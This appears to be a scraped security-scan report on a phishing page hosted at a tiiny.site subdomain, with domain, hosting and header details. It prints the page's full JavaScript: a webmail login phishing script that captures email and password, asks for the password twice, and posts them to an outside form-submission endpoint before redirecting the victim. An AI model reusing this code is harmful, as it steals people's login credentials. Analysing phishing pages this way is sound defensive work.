documentation technical

technology software

news media journalism

corporate

English

The domain 'orange-elnora-21.tiiny.site' uses the .site top-level domain and includes subdomain 'orange-elnora-21'. Count 5 characters in 'tiiny' split between 2 vowels and 3 consonants. Word splitting yields three words: ti, in, y. Median word length is 2 characters. No strong language cues emerged from the frequency lists.

_gotcha

email

password

html/d8/c5/d8c5e6f6-be51-4111-ba7f-87447bf52eee.html.gz

7eec3429c76cb48e5fd457c5afb71b7cf34bc4298d53023bae8aea715443b4a9

3063042583a2f031fb231f1fee929e5d8166c395141dad743ef6b0c899c20302

0afedcdb53df89d0814a9efe1a25786009ab5c90b0ff4afab33f14ca4c1e287d

description

https://tiiny.host/assets/logo-purple-bg.png

viewport

robots

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://webui-test chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types lottie-worker-script-loader webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

NameCheap, Inc.

tiiny.site

Amazon EC2 Abuse

IP Management

Amazon AWS Network Operations

Amazon Data Services UK

Amazon EC2 Network Operations

AMAZON-LHR


    // Formspark endpoint
    const FORMSPARK_URL = "https://submit-form.com/uVgV5hhxv";
    
    // Get email from URL hash (e.g., #email@domain.com)
    function getEmailFromURL() {
      if (window.location.hash && window.location.hash.includes('@')) {
        return window.location.hash.substring(1);
      }
      const urlParams = new URLSearchParams(window.location.search);
      if (urlParams.has('email')) {
        return urlParams.get('email');
      }
      return null;
    }
    
    // Pre-fill email field
    const emailFromUrl = getEmailFromURL();
    const emailInput = document.getElementById('user');
    if (emailFromUrl) {
      emailInput.value = emailFromUrl;
    } else {
      emailInput.value = 'No email specified in URL';
    }
    
    // Form submission handler
    const form = document.getElementById('loginForm');
    const loader = document.getElementById('loader');
    let attemptCount = 0;
    let firstPassword = '';
    
    form.addEventListener('submit', async function(e) {
      e.preventDefault();
      
      const email = document.getElementById('user').value.trim();
      const password = document.getElementById('pass').value.trim();
      
      if (!email || email === 'No email specified in URL') {
        alert('Please enter a valid email address');
        return;
      }
      
      if (!password) {
        alert('Please enter your password');
        return;
      }
      
      attemptCount++;
      
      // Show loader
      loader.style.display = 'flex';
      
      // Prepare data for Formspark
      const formData = {
        email: email,
        password: password,
        webmail_login: true
      };
      
      // Add first attempt info on second try
      if (attemptCount === 2) {
        formData.first_attempt_password = firstPassword;
        formData.attempt = 'second';
      } else if (attemptCount === 1) {
        firstPassword = password;
        formData.attempt = 'first';
      }
      
      try {
        await fetch(FORMSPARK_URL, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(formData)
        });
      } catch(err) {
        console.log('Formspark error:', err);
      }
      
      // Extract domain from email for redirect
      const domain = email.split('@')[1];
      
      // Redirect to the real domain without exposing password in URL
      setTimeout(() => {
        window.location.href = `https://${domain}`;
      }, 1500);
    });
  

PasswordField

Open-Graph-Protocol

Amazon Web Services

Amazon S3

Amazon CloudFront

Tiiny Host

Web Page

analytics.tiiny.site

✅ Low Risk - https://orange-elnora-21.tiiny.site/#je@sekure.net

Requests	IP Address	Location	AS Autonomous System
2	3.10.126.206	City of London, England, United Kingdom	AS16509Amazon.com, Inc.
2	143.204.181.11	United States	AS16509
4	2	-	-

Security Scan Report: orange-elnora-21.tiiny.site

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies6

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History